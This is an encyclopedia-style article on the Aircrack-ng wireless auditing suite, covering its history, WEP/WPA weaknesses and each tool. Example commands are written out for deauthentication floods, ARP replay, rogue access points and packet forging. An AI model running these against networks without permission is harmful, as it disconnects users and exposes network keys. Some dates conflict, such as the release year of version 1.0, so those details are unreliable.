Aircrack-ng
Aircrack-ng is a complete suite of command-line tools designed to assess the security of WiFi networks, with a focus on monitoring, attacking, testing, and cracking capabilities for 802.11 wireless LANs.[1] The suite enables packet capture and export for analysis, replay and deauthentication attacks through packet injection, testing of WiFi card and driver capabilities for capture and injection, and recovery of WEP keys using methods like PTW (introduced in 2007) or FMS/KoreK, as well as WPA/WPA2-PSK keys via dictionary attacks on captured handshakes.[1][2][3] It supports optimizations such as SSE2, AVX, AVX2, and AVX512 for accelerated processing, and is compatible with platforms including Linux, Windows, macOS, FreeBSD, OpenBSD, NetBSD, Solaris, and eComStation 2.[2][3] Originating as an evolution of the earlier Aircrack project, Aircrack-ng was developed starting around 2005 by Christophe Devine and a community of contributors, with key advancements like the PTW method enhancing WEP cracking efficiency by extending RC4 statistical analysis.[2] The project has seen active open-source development on GitHub, amassing over 4,000 commits by its 1.7 release in May 2022 (as of November 2025, the latest stable version), which added support for Wi-Fi 6E, WPA3/OWE detection, and Apple M1 compatibility.[4][5] Recognized by authoritative bodies like the Cybersecurity and Infrastructure Security Agency (CISA) for evaluating wireless password strength, Aircrack-ng emphasizes ethical use in security auditing while warning against unauthorized access.[6]Development and History
Origins and Fork
The original Aircrack tool was developed by French security researcher Christophe Devine and first published in July 2003.[7] It primarily focused on recovering Wired Equivalent Privacy (WEP) keys from captured wireless packets using statistical attacks, such as the Fluhrer-Mantin-Shamir (FMS) method, which exploited weaknesses in the RC4 stream cipher initialization.[7] This tool emerged amid growing awareness of Wi-Fi vulnerabilities following the 2001 publication of the FMS attack paper, enabling practical demonstrations of WEP's insecurity for educational and auditing purposes. By 2005, the original Aircrack had reached version 2.41 but exhibited limitations, including poor code modularity, lack of support for emerging protocols like WPA, and restricted platform compatibility primarily to Linux.[7] In response, Thomas d'Otreppe de Bouvette initiated a fork in February 2006, creating Aircrack-ng (Aircrack Next Generation) to address these issues through improved maintainability, modular design, addition of new features such as WPA-PSK cracking, and broader multi-platform support including Windows and BSD variants.[8] The fork aimed to evolve the suite into a more comprehensive, community-driven toolkit for wireless security assessment while preserving the core WEP cracking capabilities.[9] Early development of Aircrack-ng was led by d'Otreppe, with significant contributions from David Adams and a growing community of developers collaborating via SourceForge hosting.[10] This open-source effort transitioned under the GNU General Public License (GPL) version 2, facilitating ongoing enhancements and distribution across hacking distributions like Kali Linux. In 2018, the project migrated to GitHub, further enabling collaborative governance and integration of optimizations like the KoreK and PTW attacks for faster key recovery.[3]Version History
Aircrack-ng's development began with its initial release as version 0.9 on May 13, 2007, following the project's fork from the original Aircrack in February 2006. This version introduced a modular structure for the suite of tools, along with basic support for WPA cracking and enhancements such as the PTW attack for WEP key recovery, injection testing in aireplay-ng, and decryption of IEEE 802.11e headers via airdecap-ng. Early versions like 0.9 also supported foundational attacks such as the Fluhrer-Mantin-Shamir (FMS) method for exploiting WEP vulnerabilities.[11] Subsequent milestone releases built on this foundation with performance improvements and expanded compatibility. Version 1.0, released on September 7, 2009, improved airserv-ng compatibility across 32/64-bit OSes, added support for PPI (Per-Packet Information) capture formats, and fixed issues in WPA handshake detection and cross-platform compatibility, including FreeBSD.[11][12] Version 1.1, released on April 24, 2010, introduced airdrop-ng for remote packet dropping and addressed buffer overflows in several tools, enhancing overall stability for WPA cracking workflows.[11] Later versions focused on speed optimizations and modern hardware support. Version 1.2, released on April 15, 2018, significantly improved WPA cracking speeds (up to 3x faster in some cases) through better CPU utilization, added support for 802.11n/ac in airodump-ng, and included an autotools-based build system for easier compilation across platforms.[11] Version 1.4, released on September 29, 2018, enhanced packet capture handling with AVL trees for efficient processing of large files, introduced PMKID clientless cracking, and integrated hwloc for optimized performance on multi-core systems, alongside initial WPA3 compatibility.[11][13] The latest stable release, version 1.7 on May 10, 2022, incorporated over 400 commits addressing bug fixes, code refactoring, and optimizations for modern hardware, including better error handling in airmon-ng for Raspberry Pi and newer chipsets, Python 3 support for scripting tools, and improved static analysis for security.[11][4] As of November 2025, no major releases have followed 1.7, with development emphasizing ongoing maintenance through minor patches on GitHub for compatibility with updated systems, such as the Fedora 1.7-9 rebuild in January 2025.[14][3] Development practices shifted in the 2010s, notably with the full migration from SourceForge to GitHub on March 11, 2018, to facilitate better collaboration, issue tracking, and continuous integration. The project has since prioritized security auditing features over introducing new exploits, aligning with its role in Wi-Fi penetration testing.[3]Wi-Fi Security Protocols and Vulnerabilities
WEP
Wired Equivalent Privacy (WEP) was standardized in 1997 as part of the original IEEE 802.11 standard to provide basic confidentiality for wireless local area networks, equivalent to that of a wired network. It employs the RC4 stream cipher for encryption, using a shared secret key of either 40 bits or 104 bits, concatenated with a 24-bit initialization vector (IV) to generate a per-packet keystream. The protocol appends a CRC-32 checksum as an integrity check vector (ICV) to each packet before encryption, aiming to protect against eavesdropping and unauthorized access. However, WEP's design was rushed and lacked robust cryptographic review, leading to fundamental flaws that rendered it insecure from the outset.[15][16] Key weaknesses in WEP include the use of a short, static IV that is sent in plaintext, enabling rapid exhaustion of the 24-bit IV space (approximately 16 million possible values) and key reuse across packets, which exposes the keystream to XOR-based attacks. The CRC-32 integrity mechanism is a non-cryptographic checksum vulnerable to bit-flipping attacks, where an adversary can alter ciphertext bits and recompute the ICV without knowledge of the key, allowing packet modification. Additionally, WEP provides no replay protection, permitting attackers to resend captured packets indefinitely without detection. These issues, combined with RC4's key scheduling vulnerabilities, facilitate both passive and active exploitation.[17][18] Major attacks exploiting these flaws began with the Fluhrer-Mantin-Shamir (FMS) attack in 2001, which recovers the key by collecting weak IVs that bias RC4's initial keystream output, typically requiring around 5 million IVs for a 40-bit key. In 2004, KoreK's statistical attacks improved on FMS by leveraging additional IV correlations, reducing the required IVs to approximately 500,000 for reliable key recovery. The same year, KoreK's Chopchop attack enabled byte-by-byte decryption of a single packet by iteratively truncating it, guessing the last byte, and verifying via ICV, exploiting RC4's malleability and the weak integrity check—one byte per successfully injected packet. By 2007, the Pyshkin-Tews-Weinmann (PTW) attack further optimized key recovery, succeeding with about 85,000 IVs at 95% probability, independent of weak IV reliance.[19][20][21] The Wi-Fi Alliance declared WEP insecure in 2004 due to these vulnerabilities, recommending immediate transition to WPA. By 2006, with WPA2 certification becoming mandatory, WEP was fully deprecated in IEEE 802.11 standards, prohibiting its use in new Wi-Fi certified devices. Despite this, legacy hardware may still support WEP, perpetuating risks. Aircrack-ng tools target WEP by capturing IVs and applying these statistical methods or dictionary attacks on weak keys, demonstrating the protocol's practical breakability in educational and testing contexts.[22][23]WPA and WPA2
Wi-Fi Protected Access (WPA) was introduced in 2003 by the Wi-Fi Alliance as an interim enhancement to address the severe vulnerabilities in the Wired Equivalent Privacy (WEP) protocol. It employs the Temporal Key Integrity Protocol (TKIP), which builds on the RC4 stream cipher used in WEP but incorporates per-packet key mixing and a 48-bit initialization vector to prevent key reuse and improve resistance to certain attacks. WPA supports Pre-Shared Key (PSK) mode, allowing straightforward deployment in home and small office environments without requiring enterprise authentication infrastructure.[24] WPA2, formally ratified in 2004 as part of the IEEE 802.11i standard, became mandatory for all Wi-Fi Alliance certified devices starting March 13, 2006. It introduces the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP), which uses the Advanced Encryption Standard (AES) in CCM mode for robust confidentiality, integrity, and authentication, effectively replacing TKIP as the preferred encryption method while maintaining backward compatibility with legacy devices. This shift to AES-CCMP provided significantly stronger cryptographic protections compared to TKIP's RC4-based approach.[24] Despite these advancements, both protocols retain exploitable weaknesses relevant to tools like Aircrack-ng. In WPA with TKIP, the Beck-Tews attack, disclosed in 2008, exploits weaknesses in the protocol's Michael message integrity check and key derivation to decrypt broadcast packets such as ARP requests and inject forged packets, potentially enabling further network reconnaissance or disruption without full key recovery.[25] For WPA2, the Key Reinstallation Attack (KRACK), revealed in 2017, targets flaws in the 4-way handshake process by forcing nonce reuse through manipulated packet retransmissions, allowing attackers to replay encrypted frames, decrypt select traffic like HTTPS content, and potentially hijack sessions.[26] Both protocols in PSK mode are also susceptible to offline dictionary or brute-force attacks on weak passphrases, which require capturing the authentication handshake to test candidate keys computationally.[27] WPA3, announced by the Wi-Fi Alliance in June 2018, advances security further by mandating Simultaneous Authentication of Equals (SAE) for PSK authentication, which resists offline dictionary attacks through a dragonfly key exchange that protects even weak passwords. However, Aircrack-ng's capabilities remain centered on exploiting WPA and WPA2-PSK vulnerabilities via handshake capture and cracking, with no native support for WPA3's enhanced mechanisms.Timeline of Cracking Attacks
The timeline of cracking attacks on Wi-Fi security protocols highlights key vulnerabilities exploited by researchers, with Aircrack-ng playing a pivotal role in implementing and refining these techniques for auditing purposes. In 2001, the Fluhrer, Mantin, and Shamir (FMS) attack was published, revealing weaknesses in the RC4 key scheduling algorithm used in WEP, allowing key recovery through the collection of weak initialization vectors (IVs) from broadcast packets.[28] This statistical attack laid the foundation for practical WEP cracking tools, and Aircrack-ng incorporated an implementation of FMS from its early versions to enable passive key recovery with sufficient captured traffic. By 2004, refinements to WEP cracking emerged alongside the introduction of WPA. The KoreK attacks, developed by an anonymous researcher known as KoreK, optimized the FMS method by identifying additional weak IV classes, significantly reducing the number of packets needed for key recovery to around 500,000–1,000,000.[29] Concurrently, the Chopchop attack, detailed on security forums, enabled interactive decryption of WEP packets byte-by-byte without the full key, exploiting the protocol's CRC-32 checksum vulnerability.[30] That same year, the Wi-Fi Alliance introduced WPA with TKIP to mitigate WEP flaws, but early analyses revealed TKIP's Michael MIC weaknesses, paving the way for future exploits. Aircrack-ng integrated both KoreK optimizations and Chopchop support in subsequent releases, enhancing its efficiency for WEP audits. In 2007, the PTW attack further accelerated WEP key recovery, requiring as few as 40,000 packets for a 104-bit key with 50% success probability, by improving statistical biases in RC4 keystreams and incorporating ARP replay techniques.[31] Developed by Erik Tews, Ralf-Philipp Weinmann, and Andrey Pyshkin, PTW addressed limitations in prior methods under noisy conditions. Aircrack-ng version 1.0, released that year, adopted PTW as its default WEP cracking algorithm, marking a major update in performance. The first practical attacks on WPA via TKIP vulnerabilities appeared in 2008, extending WEP techniques like Chopchop to decrypt packets and forge traffic, though limited by TKIP countermeasures such as extended IVs and MIC extensions.[25] Researchers Erik Tews and Martin Beck demonstrated these in a whitepaper, enabling partial session hijacking but not full key recovery without additional flaws. Aircrack-ng updated its suite to support TKIP-specific replay and fragmentation attacks, aligning with these discoveries for testing WPA deployments. A significant WPA2 vulnerability emerged in 2017 with the disclosure of the Key Reinstallation Attack (KRACK), which exploited flaws in the 4-way handshake to reinstall encryption keys, allowing nonce reuse and decryption of traffic or injection of malicious packets.[32] Discovered by Mathy Vanhoef, KRACK affected nearly all WPA2 devices but did not compromise the pairwise master key itself, prompting widespread patches. While Aircrack-ng did not directly implement KRACK due to its active nature requiring client-side manipulation, the suite's packet injection tools like aireplay-ng facilitated demonstrations and defenses against such reinstallation risks. Into the 2020s, cracking efforts shifted toward offline dictionary and brute-force attacks on WPA2-PSK, leveraging captured handshakes without new protocol-level exploits by 2025, as WPA3 adoption grew. Optimizations focused on GPU acceleration, with tools processing billions of password guesses per second using frameworks like Hashcat, emphasizing the importance of strong passphrases over inherent protocol weaknesses.[33] Aircrack-ng continued evolving with dictionary support for WPA/WPA2 handshakes and integrations for GPU offloading via external libraries, maintaining its relevance for security assessments amid these computational advances.Core Tools
aircrack-ng
Aircrack-ng is the flagship tool in the Aircrack-ng suite, designed primarily for recovering WEP encryption keys through statistical attacks such as FMS, KoreK, and PTW, as well as cracking WPA/WPA2 pre-shared key (PSK) passphrases using dictionary or brute-force methods on captured authentication handshakes.[2] It processes offline packet captures to exploit weaknesses in the RC4 stream cipher used by WEP and the PBKDF2 key derivation in WPA/WPA2-PSK, enabling key extraction without real-time network interaction.[2][30] The tool requires input in the form of .cap files containing sufficient captured packets, typically generated by airodump-ng; for WEP cracking, this includes a minimum number of initialization vectors (IVs) paired with encrypted data packets, while WPA/WPA2 cracking needs at least the four-way handshake (such as EAPOL messages 2/3 or 3/4).[2] The FMS algorithm identifies weak IVs that allow setting up a system of linear equations over GF(2) to solve for the key bytes, exploiting predictable RC4 states from specific IV sequences.[30] KoreK builds on this by applying statistical correlations derived from empirical analysis of RC4 biases, resembling a neural network approach to refine key candidates and accelerate recovery.[30] The PTW method enhances efficiency by leveraging bitwise correlations in RC4 keystream bytes conditioned on known plaintext like ARP packets, reducing the required packet count for high success probability.[34] For WPA/WPA2-PSK, aircrack-ng tests candidate passphrases by computing the pairwise master key (PMK) via PBKDF2-HMAC-SHA1 iterations using the network SSID and passphrase, deriving the pairwise transient key (PTK), and verifying the message integrity code (MIC) against the captured handshake.[2] Upon successful cracking, aircrack-ng outputs the recovered WEP key in hexadecimal format (e.g., for 40/104-bit keys) or the WPA/WPA2 passphrase in ASCII, along with derived keying material if applicable.[2] For example, the PTW method achieves approximately 50% success probability with around 40,000 IVs for 104-bit keys, requiring about 85,000 IVs for 95% success; fewer IVs suffice for 64-bit keys.[2][34] WPA/WPA2 success depends heavily on the passphrase strength and dictionary quality, with no guaranteed recovery for complex keys. Limitations include high computational demands, particularly for exhaustive WPA/WPA2 searches on modern hardware, and lack of support for WPA3, which employs simultaneous authentication of equals (SAE) instead of PSK handshakes.[2]aireplay-ng
Aireplay-ng is a command-line tool within the Aircrack-ng suite designed for injecting and replaying wireless frames to facilitate the assessment of Wi-Fi network security.[35] It primarily generates artificial traffic to accelerate the capture of data needed for cracking encryption keys, such as WEP initialization vectors (IVs) or WPA handshakes, by exploiting vulnerabilities in 802.11 protocols.[35] The tool operates in monitor mode on compatible wireless interfaces, allowing it to forge and transmit packets without association to the target network.[35] The core functions of aireplay-ng include packet injection for forging authentication frames and replaying captured packets to amplify network traffic.[35] It supports deauthentication and disassociation attacks, which send forged management frames to disconnect clients from an access point, forcing reconnections that reveal WPA/WPA2 handshakes for offline cracking.[35] For WEP networks, aireplay-ng enables ARP replay attacks by capturing and reinjecting ARP request packets, which generates a high volume of encrypted traffic containing unique IVs essential for key recovery.[35] Additionally, it performs chopchop attacks, which decrypt WEP packets byte-by-byte through repeated injection and analysis, though this method is slower and requires no prior knowledge of IP addresses.[35] Usage of aireplay-ng requires a wireless interface in monitor mode, typically enabled via airmon-ng, to transmit frames effectively.[35] Common command options include-0 or --deauth for deauthentication floods (e.g., aireplay-ng -0 5 -a <BSSID> -c <client MAC> mon0 to send five deauth packets), and -3 or --arpreplay for ARP-based traffic amplification (e.g., aireplay-ng -3 -b <BSSID> -h <client MAC> mon0 using a captured ARP packet).[35] Other parameters control injection rate with -x (packets per second) and target specifics like BSSID (-b) or client MAC (-c), ensuring precise attacks while minimizing detection.[35] Interactive packet selection is available in -2 mode for manual replay, and -9 tests injection capability before full attacks.[35]
Aireplay-ng significantly accelerates WEP cracking by increasing the rate of IV collection through active injection, reducing the time from hours of passive sniffing to minutes of targeted replay.[35] For WPA/WPA2, its deauthentication capability is essential to capture the four-way handshake required for dictionary or brute-force attacks in aircrack-ng.[35] Effectiveness depends on the wireless card's injection rate, which can be optimized by setting higher transmission rates (e.g., via iwconfig).[35]
Hardware compatibility is crucial, as aireplay-ng requires cards supporting raw packet injection and monitor mode.[36] Atheros chipsets, such as the AR9271 found in USB adapters like the ALFA AWUS036NHA, provide reliable performance with kernel/mac80211 drivers, enabling high injection rates up to 500 packets per second.[36] Other supported examples include Ralink RT3070 and certain Qualcomm Atheros variants, though success varies by driver version and firmware.[36]
airodump-ng
Airodump-ng is a packet sniffer and analyzer within the Aircrack-ng suite, designed for passive monitoring and capture of Wi-Fi traffic to support network reconnaissance. It operates by capturing raw 802.11 frames, including beacons, data packets, and management frames such as probe responses and association requests, while monitoring 2.4 GHz channels by default with automatic hopping to scan multiple frequencies. The tool displays real-time information on access points (APs) and clients, including ESSIDs, BSSIDs, signal strength (PWR), receive quality (RXQ), number of beacons and data packets, channel, and connected clients' MAC addresses, power levels, probe requests, and packet loss rates.[37] It also detects encryption types, such as WEP, WPA, WPA2, or WPA3, along with ciphers (e.g., TKIP, CCMP) and authentication methods (e.g., PSK).[37] The captured data is saved in multiple formats for further analysis, with pcap-compatible .cap files providing full packet captures suitable for tools like Wireshark. Other outputs include .csv files detailing AP and client information, .kismet.csv for compatibility with Kismet wireless intrusion detection systems, and .ivs files exporting only initialization vectors (IVs) for WEP analysis. Additional formats encompass .gps for location data and .kismet.netxml for network topology exports. These files enable offline examination of network structures and traffic patterns.[37] Key command-line options allow customization of airodump-ng's behavior, such as--channel (or -c) to fix monitoring on specific channels (e.g., -c 1,6,11) or enable hopping intervals via -f <msecs>, --bssid to filter captures to a single AP's MAC address (e.g., --bssid 00:14:6C:7A:41:20), and --write (or -w) to specify a prefix for output files (e.g., -w capture). The --ivs option streamlines WEP IV collection by saving only relevant data, reducing file sizes for targeted analysis.[37]
Enhancements include GPS integration through --gpsd, which logs coordinates from a GPS receiver into .gps files for mapping network locations, and automatic detection of WPA handshakes in real-time console output (e.g., alerting "WPA handshake: [s]. Captured .cap or .ivs files from airodump-ng can subsequently be processed by aircrack-ng for key cracking.[37]Attack and Automation Tools
airbase-ng
airbase-ng is a versatile tool within the Aircrack-ng suite designed to create rogue access points (APs) that simulate legitimate Wi-Fi networks, thereby luring client devices to associate with them for the purpose of conducting targeted attacks on those clients rather than the AP itself.[38] By emulating various network configurations, including open authentication, WEP-encrypted networks, and WPA/WPA2 setups, airbase-ng enables the generation of deceptive beacons and probe responses to attract clients, even those configured for hidden SSIDs via the-X option.[38] This client-focused approach facilitates the capture of authentication materials and traffic without directly targeting an existing AP, distinguishing it from tools that inject packets into live networks.[38]
The tool supports several specific attacks that exploit client vulnerabilities to recover encryption keys or authentication data. For WEP networks, airbase-ng implements the Caffe Latte attack using the -L option, which leverages gratuitous ARP requests from associating clients to generate sufficient initialization vectors (IVs) for key recovery, even without access to the original AP.[38] Similarly, the Hirte attack, enabled by the -N option, extends this by amplifying weak IVs through fragmentation of any captured ARP or IP packets from the client, allowing key extraction in scenarios where the AP is unavailable.[38] For WPA/WPA2, airbase-ng can force client associations to capture the four-way handshake by configuring appropriate tags (e.g., -z 2 for WPA-TKIP or -Z 4 for WPA2-CCMP), generating the necessary traffic to prompt re-authentication.[38]
Key command-line options allow precise control over the rogue AP's behavior, such as -e <ESSID> to set the network name, -c <channel> to specify the operating channel, -w <WEP key> for encryption in WEP mode, and -a <BSSID> to define the fake AP's MAC address.[38] Additional parameters like -s enforce shared key authentication for WEP, while -P enables responses to all probe requests to increase client attraction, and -x <nbpps> sets the packet transmission rate (default 100 packets per second) to simulate active traffic.[38] Usage typically involves running airbase-ng <options> <monitor interface>, such as airbase-ng -c 9 -e "teddy" -W 1 mon0, which creates a WEP-enabled rogue AP on channel 9 named "teddy".[38]
Output from airbase-ng includes real-time console displays of client associations, probe requests, and encryption details, alongside the creation of a tap interface (e.g., at0) for handling decrypted or routed packets.[38] Captured frames, including handshakes and attack-generated traffic, can be saved to .cap files using the -F <prefix> option for subsequent analysis or cracking with other Aircrack-ng tools.[38]
Advanced features extend airbase-ng's utility for complex scenarios, including support for multiple APs via --bssids <file> to load a list of BSSIDs for simultaneous emulation, and beacon flooding for denial-of-service (DoS) effects by overwhelming clients with fake network advertisements using options like -P combined with -C <seconds> to probe and beacon multiple ESSIDs.[38] It also supports ad-hoc mode (-A) for peer-to-peer simulations and external packet processing (-Y) to integrate with custom scripts or tools for enhanced traffic manipulation.[38]
airmon-ng
airmon-ng is a command-line utility within the Aircrack-ng suite designed to manage wireless network interfaces, primarily by enabling and disabling monitor mode to facilitate wireless security auditing.[39] It also handles the detection of interfering processes and provides diagnostic information about supported chipsets and drivers.[39] Without arguments, runningairmon-ng displays the current status of wireless interfaces, including their mode, chipset details, and driver information.[39]
The core function of airmon-ng is to start or stop monitor mode on a specified wireless interface, which allows the interface to passively capture all wireless traffic without associating with a network.[39] For instance, executing airmon-ng start wlan0 creates a new virtual monitor interface named wlan0mon (or mon0 in some configurations), enabling raw 802.11 frame capture.[39] It automatically checks for and warns about processes that may interfere with monitor mode, such as NetworkManager or dhclient, which can disrupt packet injection or capture.[39] To mitigate these, airmon-ng can kill such processes upon request.[39] Additionally, it detects common wireless chipsets, including Atheros (e.g., AR9271 with ath9k driver) and Ralink (e.g., RT3070 with rt2800usb driver), ensuring compatibility before mode switching.[39]
Key commands include airmon-ng start <interface> [channel] to initiate monitor mode on the specified channel, airmon-ng stop <interface> to revert to managed mode and remove the monitor interface, and airmon-ng restart <interface> for a full cycle of stopping and restarting.[39] The airmon-ng check command lists potentially problematic processes like wpa_supplicant, while airmon-ng check kill terminates them automatically to prevent conflicts.[39] For debugging, options such as --verbose or --debug provide detailed output on interface operations and errors.[39]
airmon-ng requires root privileges to modify kernel-level interface settings and relies on compatible wireless drivers that support monitor mode, such as ath9k for Atheros chipsets or rtl8187 for Realtek devices.[39] Without these, attempts to enable monitor mode will fail, often indicated by error messages in the output.[39]
In troubleshooting scenarios, airmon-ng addresses common issues by automatically killing interfering daemons like wpa_supplicant during mode activation.[39] It also supports the creation and deletion of virtual interfaces; lingering monitor interfaces can be removed manually using iw dev <[interface](/page/Interface)> del if needed.[39] For driver-related problems, reloading modules (e.g., rmmod ath9k; [modprobe](/page/Modprobe) ath9k) may resolve detection failures.[39]
As a foundational tool in the Aircrack-ng suite, airmon-ng serves as a prerequisite for all packet capture and injection operations, preparing interfaces for use by subsequent tools in wireless assessments.[39]
besside-ng
Besside-ng is an automated tool within the Aircrack-ng suite designed to crack WEP-encrypted wireless networks and capture WPA/WPA2 handshakes without requiring manual intervention from the user. Developed by Andrea Bittau, it builds on concepts from earlier tools like Wesside-ng but extends support to WPA encryption, enabling it to target both legacy and modern Wi-Fi security protocols in range. It is an experimental tool that requires enabling experimental features during compilation (e.g., using--with-experimental flag).[40][3] It requires a compatible wireless interface capable of packet injection.[40]
The workflow of besside-ng begins with scanning for nearby access points (APs) using the specified wireless interface in monitor mode. Upon detecting a WEP network, it automatically associates with the AP, injects packets to generate initialization vectors (IVs), and accumulates sufficient data for on-the-fly cracking using integrated aircrack-ng algorithms. For WPA/WPA2 networks, it monitors for clients, performs deauthentication attacks to force handshake exchanges, and logs the resulting 4-way handshakes. The tool handles association, injection, and capture seamlessly, directing output to log files and packet captures while continuing to scan other networks in parallel. This automation reduces the need for separate commands, making it suitable for penetration testing in dynamic environments.[40] It internally leverages aireplay-ng for packet injection and deauthentication tasks.[40]
Besside-ng operates in two primary modes: full automatic mode, which targets both WEP and WPA networks by default, and WPA-only mode activated via the -W option to focus exclusively on handshake capture without attempting WEP cracks. In WPA mode, it can optionally upload captured handshakes to a remote server like wpa.darkircop.org for dictionary-based cracking and feasibility analysis, providing statistics on passphrase strength. These modes allow users to tailor the tool for specific security assessments, such as rapid WEP exploitation or offline WPA analysis preparation.[40]
Key command-line options include:
-b <target mac>: Specifies a target BSSID to focus attacks on a single AP.-s <WPA server>: Defines the upload server for WPA handshake processing (default: wpa.darkircop.org).-c <chan>: Locks scanning to a specific channel to optimize for known networks.-p <pps>: Sets the packets-per-second rate for injection, balancing speed and detectability.-W: Enables WPA-only mode.-v: Activates verbose logging for detailed output.-h: Displays the help screen.
besside-ng [options] <interface>, where the interface must be pre-configured in monitor mode via airmon-ng.[40]
Output from besside-ng includes a primary log file named besside.log, which records details such as SSID, recovered WEP keys in hexadecimal and ASCII formats, BSSID, channel, and encryption type for each cracked network. For WPA captures, it generates .cap files containing handshakes, suitable for later processing with tools like aircrack-ng or external dictionaries. Successful WEP cracks can occur in minutes under good signal conditions and sufficient client traffic, often yielding keys after capturing 10,000–50,000 IVs depending on the network's activity. WPA outputs are stored for offline use, with upload results providing estimated cracking times based on passphrase complexity.[40]
Limitations of besside-ng include its dependence on hardware supporting reliable packet injection, such as certain Atheros or Ralink chipsets, which may fail on incompatible devices leading to incomplete captures. For WPA2 networks with strong passphrases (e.g., 12+ characters mixing cases and symbols), handshake capture succeeds but cracking remains computationally intensive and often requires substantial dictionary resources or GPU acceleration beyond the tool's scope. It performs less effectively in low-traffic environments where client associations are sparse, and the optional upload service may introduce privacy concerns or downtime risks.[40]
Supporting Utilities
airolib-ng
Airolib-ng is a utility in the Aircrack-ng suite that facilitates the precomputation and management of Pairwise Master Keys (PMKs) for accelerating WPA/WPA2-PSK dictionary-based attacks on captured handshakes.[41] It operates by storing lists of network identifiers (ESSIDs) and potential passphrases in a database, then deriving PMKs for each ESSID-password pair to enable rapid verification during cracking without recomputing expensive hashes on demand.[42] This tool addresses the computational bottleneck in WPA/WPA2 cracking, where generating PMKs traditionally slows down brute-force or dictionary attempts.[43] The core process begins with importing ESSID and password lists into the database using theimport command, such as airolib-ng <database> import passwd <wordlist_file> for passphrases or import essid <essid_file> for network names.[42] PMKs are then computed via the batch subcommand, which applies the PBKDF2-HMAC-SHA1 algorithm with 4096 iterations per pair—a standard derived from the WPA2-PSK protocol—to produce 256-bit keys.[41] Users can verify the integrity of these precomputed PMKs using the test command, optionally with the all flag to delete invalid entries and optimize the database.[42] Additional operations include cleaning the database with clean to reduce size and check consistency, exporting to formats like coWPAtty via export cowpatty, or querying statistics with info.[42]
For storage, airolib-ng employs an SQLite3 database (requiring version 3.3.17 or later), which efficiently handles large collections of ESSID-password combinations and their associated PMKs with minimal overhead across platforms.[41] The ESSID serves as the salt in the PBKDF2 derivation, allowing support for custom or multiple network-specific tables within a single database.[43] This structure enables distributed precomputation, where PMKs can be generated on multiple systems and merged.[41]
By precomputing PMKs, airolib-ng significantly reduces cracking times; for instance, it enables aircrack-ng to test over 50,000 passwords per second against a captured handshake, transforming what might take hours into seconds for common passphrases.[41] It integrates seamlessly with aircrack-ng by specifying the database path with the -r option, such as aircrack-ng -r <database> <capture_file>, allowing direct use of the rainbow tables for efficient dictionary attacks on WPA/WPA2 handshakes.[42]
packetforge-ng
Packetforge-ng is a utility within the Aircrack-ng suite designed to forge custom 802.11 packets, particularly for use in wireless network penetration testing and security assessments. It enables the creation of encrypted packets from templates or modifications to existing captures, ensuring they mimic legitimate traffic to facilitate injection attacks. By leveraging pseudorandom generation algorithms (PRGA) derived from prior captures, such as those obtained via fragmentation or chop-chop attacks, packetforge-ng produces packets that appear authentic to target networks, including proper 802.11 headers, MAC addresses, and encryption flags.[44] The tool's core capabilities include generating specific packet types: ARP requests (mode -0 or --arp), UDP packets (mode -1 or --udp), ICMP packets (mode -2 or --icmp), null packets (mode -3 or --null), and custom packets (mode -9 or --custom) based on user-defined payloads or modified input files. For custom packets, it can alter existing captures by applying PRGA keystreams to encrypt or re-encrypt payloads while preserving or adjusting layer 2 and 3 details. It supports fragmentation by utilizing PRGA files from aireplay-ng's fragmentation mode, allowing the creation of fragmented packets that can solicit responses from access points. This precision in handling frame control words, FromDS/ToDS bits, and WEP encryption options ensures the forged packets integrate seamlessly with 802.11 protocol requirements.[44] Usage of packetforge-ng follows the syntaxpacketforge-ng <mode> <options>, where modes specify the packet type and options configure details like MAC addresses (-a for BSSID, -h for source MAC, -c for destination MAC), IP addresses (-k for destination IP:port, -l for source IP:port), TTL (-t), and file inputs/outputs (-r for reading from a raw or pcap file, -y for PRGA file, -w for writing to a pcap output file). The -e option disables WEP encryption if needed, while -p sets the frame control word in hexadecimal for fine-tuned header manipulation. For example, to forge an ARP request packet, one might use: packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w arp-request.cap, which sets the AP and source MACs, destination and source IPs, applies the PRGA keystream, and outputs a pcap file. Similarly, for a custom packet from an input capture: packetforge-ng -9 -r input.cap -y keystream.xor -w output.cap. These commands allow users to build packets with tailored payloads, such as short null packets for deauthentication testing (packetforge-ng -3 -s 42 -a BSSID -h SMAC -w short-packet.cap -y fragment.xor).[44]
In attack applications, packetforge-ng is primarily used to craft requests that provoke responses from target devices, thereby generating initialization vectors (IVs) for WEP key cracking or traffic for further analysis. For instance, forged ARP requests can elicit ARP replies from clients or access points, accelerating IV collection in WEP networks by injecting the packets via aireplay-ng. It supports scenarios requiring authenticated-looking traffic, such as replaying modified captures to test network defenses or simulate client associations. The resulting forged pcap files are directly compatible with injection tools like aireplay-ng for transmission over monitored wireless interfaces. Output files can be inspected with utilities like tcpdump to verify structure before deployment. Note that packetforge-ng is optimized for WEP-encrypted environments and requires a valid PRGA file for encryption; it avoids unnecessary bit manipulations like FromDS/ToDS toggles unless specified.[44]
wpaclean
wpaclean is a utility within the Aircrack-ng suite designed to filter and clean wireless packet capture files, specifically targeting WPA/WPA2 handshake data for subsequent analysis and cracking processes. It processes input .cap files by extracting only the essential packets required for WPA key recovery, namely the 4-way EAPOL handshake packets and associated beacon frames from the access point, while discarding irrelevant traffic such as data frames, management frames unrelated to authentication, duplicates, and general noise. This selective extraction ensures that the output file contains streamlined data, making it suitable for input into cracking tools like aircrack-ng.[45][46] The process begins with providing one or more input capture files obtained from tools like airodump-ng, along with a specified output filename, using the basic syntax:wpaclean <output.cap> <input1.cap> [input2.cap ...]. wpaclean automatically detects and isolates complete or partial 4-way handshakes by analyzing the EAPOL key exchange sequence between the client and access point, as well as relevant beacons that provide network parameters like SSID and security settings. It handles multiple input files by merging and filtering them into a single, cleaned output file, which significantly reduces the overall file size—often by a substantial margin, as extraneous packets are removed—thereby optimizing storage and processing efficiency for resource-constrained environments. For instance, in scenarios involving large captures from prolonged monitoring sessions, this filtering can eliminate gigabytes of irrelevant data, focusing solely on authentication-related elements.[45][46][47]
